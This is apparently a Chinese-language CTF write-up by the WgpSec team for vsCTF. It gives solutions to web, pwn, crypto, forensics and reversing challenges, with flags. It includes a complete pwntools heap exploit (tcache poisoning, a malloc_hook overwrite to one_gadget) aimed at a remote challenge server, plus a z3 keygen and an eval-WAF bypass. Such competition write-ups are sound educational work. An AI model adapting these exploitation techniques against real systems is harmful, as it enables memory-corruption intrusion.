点击蓝字
关注我们
声明
本文作者:CTF战队
本文字数:4000
阅读时长:10~20min
附件/链接:点击查看原文下载
本文属于【狼组安全社区】原创奖励计划,未经许可禁止转载
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,狼组安全团队以及文章作者不为此承担任何责任。
狼组安全团队有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经狼组安全团队允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。
Web/Sanity Check
源码里发现 flag
Web/Baby Eval
题目给了源码
const express = require('express');
const app = express();function escape(s) {
return `${s}`.replace(/./g,c => "&#" + c.charCodeAt(0) + ";");
}
function directory(keys) {
const values = {
"title": "View Source CTF",
"description": "Powered by Node.js and Express.js",
"flag": process.env.FLAG,
"lyrics": "Good job, you’ve made it to the bottom of the mind control facility. Well done.",
"createdAt": "1970-01-01T00:00:00.000Z",
"lastUpdate": "2022-02-22T22:22:22.222Z",
"source": require('fs').readFileSync(__filename),
};
return "<dl>" + keys.map(key => `<dt>${key}</dt><dd><pre>${escape(values[key])}</pre></dd>`).join("") + "</dl>";
}
app.get('/', (req, res) => {
const payload = req.query.payload;
if (payload && typeof payload === "string") {
const matches = /([\.\(\)'"\[\]\{\}<>_$%\\xu^;=]|import|require|process|proto|constructor|app|express|req|res|env|process|fs|child|cat|spawn|fork|exec|file|return|this|toString)/gi.exec(payload);
if (matches) {
res.status(400).send(matches.map(i => `<code>${i}</code>`).join("<br>"));
} else {
res.send(`${eval(payload)}`);
}
} else {
res.send(directory(["title", "description", "lastUpdate", "source"]));
}
});app.listen(process.env.PORT, () => {
console.log(`Server started on http://127.0.0.1:${process.env.PORT}`);
});
应该只需要拿到环境变量里的flag就可以了。vsctf{regExAin’tGoodEnufForWAF}
EzOrange
堆溢出,改top chunk的size然后构造出unsorted bin泄露libc,最后打tcache,改malloc_hook为one_gadget
from pwn import *# context.log_level = 'debug'
binary = './ezorange'
local = 0
if local:
p = process(binary)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
else:
p = remote('104.197.118.147', 10160)
libc = ELF('./libc.so.6')
elf = ELF(binary)
def add(index, size):
p.sendlineafter('> ', '1')
p.sendlineafter('number: ', str(index))
p.sendlineafter('Size: ', str(size))
def edit(index, content_index, content):
p.sendlineafter('> ', '2')
p.sendlineafter('number: ', str(index))
p.sendlineafter('index: ', str(content_index))
p.sendlineafter('New value: ', str(content))
def edit2(index, content_index):
p.sendlineafter('> ', '2')
p.sendlineafter('number: ', str(index))
p.sendlineafter('index: ', str(content_index))
p.recvuntil('Current value: ')
value = int(p.recvuntil(b'\n', drop=True).decode(), 10)
success('value -> {}'.format(hex(value)))
p.sendlineafter('New value: ', str(value))
return value
# gdb.attach(p)
add(0, 0x100)
add(1, 0x100)
edit(1, 0x10a, 0x0)
add(0, 0x1000)
edit2(1, 0x110)
libc_base = edit2(1, 0x110)
for i in range(5):
libc_base = (edit2(1, 0x111+i) << 8*(i+1)) + libc_base
libc_base = libc_base - 0x70 - libc.sym['__malloc_hook']
success('libc_base -> {}'.format(hex(libc_base)))
malloc_hook = libc_base + libc.sym['__malloc_hook']
success('malloc_hook -> {}'.format(hex(malloc_hook)))
add(1, 0xa10)
add(1, 0x500)
edit(1, 0x50a, 0x0)
add(1, 0x1000)
add(1, 0x9a0)
add(1, 0x500)
add(0, 0x100)
key = edit2(0, 0x22000)
for i in range(4):
key = (edit2(0, 0x22001+i) << 8*(i+1)) + key
key += 0x66
success('key -> {}'.format(hex(key)))
for i in range(3):
edit(1, 0x50a, 0x0)
add(1, 0x1000)
add(1, 0x9a0)
add(1, 0x500)
add(1, 0x100)
add(1, 0x100)
for i in range(6):
edit(0, 0x88000+i, ((malloc_hook ^ key) >> i*8) & 0xff)
add(1, 0x100)
one_gadget = [0xceb6e, 0xceb71, 0xceb74]
add(1, 0x100)
for i in range(8):
edit(1, i, ((libc_base + one_gadget[1]) >> i*8) & 0xff)
add(1, 0x100)
p.interactive()
# vsctf{[email protected][email protected][email protected]_1834499ab76bff54ceff72af11ca55e0}
Discord
加群就能看到~
Hexahue Hate!
需要对应翻译出来。https://www.omniglot.com/conscripts/hexahue.php
from PIL import Imageim = Image.open('1.png')
pix = im.load()
width = im.size[0]
height = im.size[1]
white = (255, 255, 255)
black = (0, 0, 0)
red = (255, 0, 0)
green = (0, 255, 0)
blu = (0, 0, 255)
yellow = (255, 255, 0)
light_blue = (0, 255, 255)
magenta = (255, 0, 255)
gray = (128, 128, 128)
hexahue = {}
hexahue[(magenta, red, green, yellow, blu, light_blue)] = 'a'
hexahue[(red, magenta, green, yellow, blu, light_blue)] = 'b'
hexahue[(red, green, magenta, yellow, blu, light_blue)] = 'c'
hexahue[(red, green, yellow, magenta, blu, light_blue)] = 'd'
hexahue[(red, green, yellow, blu, magenta, light_blue)] = 'e'
hexahue[(red, green, yellow, blu, light_blue, magenta)] = 'f'
hexahue[(green, red, yellow, blu, light_blue, magenta)] = 'g'
hexahue[(green, yellow, red, blu, light_blue, magenta)] = 'h'
hexahue[(green, yellow, blu, red, light_blue, magenta)] = 'i'
hexahue[(green, yellow, blu, light_blue, red, magenta)] = 'j'
hexahue[(green, yellow, blu, light_blue, magenta, red)] = 'k'
hexahue[(yellow, green, blu, light_blue, magenta, red)] = 'l'
hexahue[(yellow, blu, green, light_blue, magenta, red)] = 'm'
hexahue[(yellow, blu, light_blue, green, magenta, red)] = 'n'
hexahue[(yellow, blu, light_blue, magenta, green, red)] = 'o'
hexahue[(yellow, blu, light_blue, magenta, red, green)] = 'p'
hexahue[(blu, yellow, light_blue, magenta, red, green)] = 'q'
hexahue[(blu, light_blue, yellow, magenta, red, green)] = 'r'
hexahue[(blu, light_blue, magenta, yellow, red, green)] = 's'
hexahue[(blu, light_blue, magenta, red, yellow, green)] = 't'
hexahue[(blu, light_blue, magenta, red, green, yellow)] = 'u'
hexahue[(light_blue, blu, magenta, red, green, yellow)] = 'v'
hexahue[(light_blue, magenta, blu, red, green, yellow)] = 'w'
hexahue[(light_blue, magenta, red, blu, green, yellow)] = 'x'
hexahue[(light_blue, magenta, red, green, blu, yellow)] = 'y'
hexahue[(light_blue, magenta, red, green, yellow, blu)] = 'z'
hexahue[(black, white, white, black, black, white)] = '.'
hexahue[(white, black, black, white, white, black)] = ','
hexahue[(white, white, white, white, white, white)] = ' '
hexahue[(black, black, black, black, black, black)] = ' '
hexahue[(black, gray, white, black, gray, white)] = '0'
hexahue[(gray, black, white, black, gray, white)] = '1'
hexahue[(gray, white, black, black, gray, white)] = '2'
hexahue[(gray, white, black, gray, black, white)] = '3'
hexahue[(gray, white, black, gray, white, black)] = '4'
hexahue[(white, gray, black, gray, white, black)] = '5'
hexahue[(white, black, gray, gray, white, black)] = '6'
hexahue[(white, black, gray, white, gray, black)] = '7'
hexahue[(white, black, gray, white, black, gray)] = '8'
hexahue[(black, white, gray, white, black, gray)] = '9'
current_letter = []
flag = ""
n = 0
while n < 3711:
for i in [10,20,30]:
for j in [10,20]:
current_letter.append(tuple(im.getpixel((j+n*30,i))))
flag = flag + (hexahue[tuple(current_letter)])
current_letter = []
n = n + 1
print(flag)
根据 pil 写了个脚本提取颜色进行匹配
lorem ipsum dolor sit amet consectetur adipiscing elit sed do eiusmod tempor incididunt ut labore et dolore magna aliqua lectus sit amet est placerat in amet cursus sit amet dictum purus sit amet volutpat consequat mauris nunc posuere ac ut consequat semper viverra nam libero justo at risus viverra adipiscing at in tellus integer feugiat sem viverra aliquet eget sit amet tellus gravida dictum fusce ut placerat orci nulla pellentesque cursus risus at ultrices mi tempus imperdiet nulla maecenas accumsan lacus vel facilisis volutpat est velit aenean vel elit scelerisque mauris pellentesque pulvinar message vel turpis nunc eget lorem dolor sed nisi lacus sed viverra tellus in hac non pulvinar neque laoreet suspendisse interdum consectetur libero eget lorem dolor sed viverra ipsum nunc aliquet bibendum enim a cras semper auctor neque vitae tempus quam lectus urna duis convallis convallis tellus id interdum pretium nibh ipsum consequat nisl vel pretium lectus quam risus pretium quam vulputate dignissim eu consequat ac felis donec et duis tristique sollicitudin nibh sit amet ultrices gravida dictum fusce ut placerat orci nulla pellentesque ac turpis egestas integer eget aliquet nibh message pellentesque id nibh tortor id aliquet lectus ut tristique et egestas quis donec massa sapien message faucibus et molestie ac feugiat sed lectus pharetra massa massa ultricies mi quis hendrerit dolor magna velit euismod in pellentesque massa et malesuada fames ac turpis egestas maecenas pharetra convallis bibendum ut tristique et egestas quis a arcu cursus vitae congue mauris rhoncus aenean semper viverra nam libero justo laoreet sit lacus sed turpis tincidunt id aliquet lacus vestibulum message sed arcu non odio euismod lacinia the message you seek is ihatehexahuesomuchpleasehelp sociis natoque penatibus et magnis dis parturient montes nascetur elit at imperdiet dui accumsan sit amet nulla facilisi id venenatis a condimentum vitae sapien pellentesque habitant enim blandit volutpat maecenas volutpat blandit aliquam etiam ut sem nulla pharetra diam sit amet in eu mi bibendum neque egestas congue quisque egestas diam cursus vitae congue mauris rhoncus aenean vel elit faucibus in ornare quam viverra orci sagittis eu ante in nibh mauris cursus mattis molestie a vel fringilla est ullamcorper eget consectetur adipiscing elit pellentesque habitant morbi tristique urna molestie at elementum eu facilisis sed odio elit pellentesque habitant morbi tristique volutpat blandit aliquam etiam erat velit scelerisque in sollicitudin aliquam ultrices sagittis orci a elementum eu facilisis sed odio morbi quis vulputate enim nulla aliquet porttitor lacus luctus accumsan tortor posuere morbi tristique senectus message et netus et malesuada fames magna etiam tempor orci eu lobortis elementum sed felis eget velit aliquet sagittis dui ut ornare lectus sit amet est fermentum et sollicitudin ac orci phasellus egestas tellus viverra nam libero justo laoreet sit amet cursus lectus vestibulum mattis ullamcorper velit sed ullamcorper morbi tincidunt nunc pulvinar sapien et ligula ullamcorper malesuada proin libero adipiscing at in tellus integer massa sed elementum tempus egestas sed sed risus pretium quam morbi non arcu risus quis varius quam quisque id diam tempus urna et pharetra pharetra massa massa ultricies mi et molestie ac feugiat sed lectus vestibulum mattis eu scelerisque felis imperdiet proin in ornare quam viverra orci fringilla est ullamcorper eget nulla diam vel quam elementum pulvinar etiam feugiat sed lectus vestibulum mattis ullamcorper velit purus semper eget duis at tellus at urna condimentum mattis
vsctf{IHATEHEXAHUESOMUCHPLEASEHELP}
Lost Assignment
数电,依次调出来7个
二进制转字符串,补符号位
vsctf{10Gi}
Feedback Survey
问卷反馈
Roblox1
十六进制里看像是win磁盘找roblox用户名
在chrome记录中发现
vsctf{ftcsvisgreat}
Tuning Test
需要找到key,然后再nc得到flag check,长度35,每隔5位是-,然后是z3
z3解方程
from z3 import *
a1 = [z3.BitVec("p%d" % i, 8)for i in range(35)]
s=Solver()
s.add(a1[26] + a1[24] + a1[15] + a1[13] + a1[4] + a1[2] + a1[0] + a1[28] == 486)
s.add(a1[1] * a1[0] - a1[4] + a1[12] * a1[13] - a1[16] + a1[24] * a1[25] - a1[28] == 13713)
s.add(a1[27] * a1[14] * a1[3] - a1[15] * a1[2] * a1[25] == -6256)
s.add((a1[1] - a1[3]) * a1[4] == 48)
s.add((8 * a1[13] - 4 * a1[15]) * a1[14] == 20604)
s.add((4 * a1[28] - 4 * a1[0]) * a1[27] == -5616)
s.add(a1[4] - a1[3] - a1[2] - a1[1] + a1[0] * a1[0] == 6744)
s.add(a1[16] - a1[15] - a1[14] - a1[13] + a1[12] * a1[12] == 2405)
s.add(a1[28] - a1[27] - a1[26] - a1[25] + a1[24] * a1[24] == 4107)
s.add(a1[14] <= 57)
s.add((a1[14] + a1[24]) * (a1[28] - a1[1]) == -1508)
# for i in range(35):
# if((i%12)<=4):
# print(i,end=",")
b=[0,1,2,3,4,12,13,14,15,16,24,25,26,27,28]
for i in range(len(a1)):
s.add(a1[i]>33)
s.add(a1[i]<127)
for i in range(len(b)):
s.add(a1[b[i]] <=90)
s.add(a1[b[i]] > 47)
s.add(a1[b[i]]!=58)
s.add(a1[b[i]] != 59)
s.add(a1[b[i]] != 60)
s.add(a1[b[i]] != 61)
s.add(a1[b[i]] != 62)
s.add(a1[b[i]] != 63)
s.add(a1[b[i]] != 64)
s.add(a1[14]<=57)
for i in range(35):
if(i%6==5):
print(i,end=',')
s.add(a1[i]==45)
print(s.check())
answer=s.model()
print(answer)
a=[83,69,56,68,48,45,72,72,72,72,72,45,50,75,51,49,80,45,72,72,72,72,72,45,65,68,54,52,56,45,66,72,66,72,72]
for i in range(len(a)):
print(chr(a[i]),end='')得到第一层key为
SE8D0-HHHHH-2K31P-HHHHH-AD648-BHBHH
继续向下走,第二层验证是两段H和BH的验证,它把6-10,18-22,30-34拿了出来,进行第二次验证,第二次验证是rc4和base64,所以写出脚本
import base64
import string
str1="nRYEZjDuqxtlL8L6EatC"
print(len(b))
# str1 = "x2dtJEOmyjacxDemx2eczT5cVS9fVUGvWTuZWjuexjRqy24rV29q"string1 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
string2 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
r=[0xeb,0x65,0x67,0x12,0x56,0xda,0xc9,0x7e,0x02,0x46,0xac,0x94,0x74,0xd9,0x38]
r1=[]
flag=base64.b64decode(str1.translate(str.maketrans(string1,string2)))
print(flag)
for i in range(len(flag)):
print(chr(flag[i]^r[i]),end="")
得到最终的key为
SE8D0-vsctf-2K31P-4begi-AD648-nnerz
然后nc
vsctf{you_are_good_at_z3,but_maybe_i_should_play_genshin_impact_first?}
扫描关注公众号回复加群
和师傅们一起讨论研究~
长
按
关
注
WgpSec狼组安全团队
微信号:wgpsec
Twitter:@wgpsec
如有侵权请联系:admin#unsafe.sh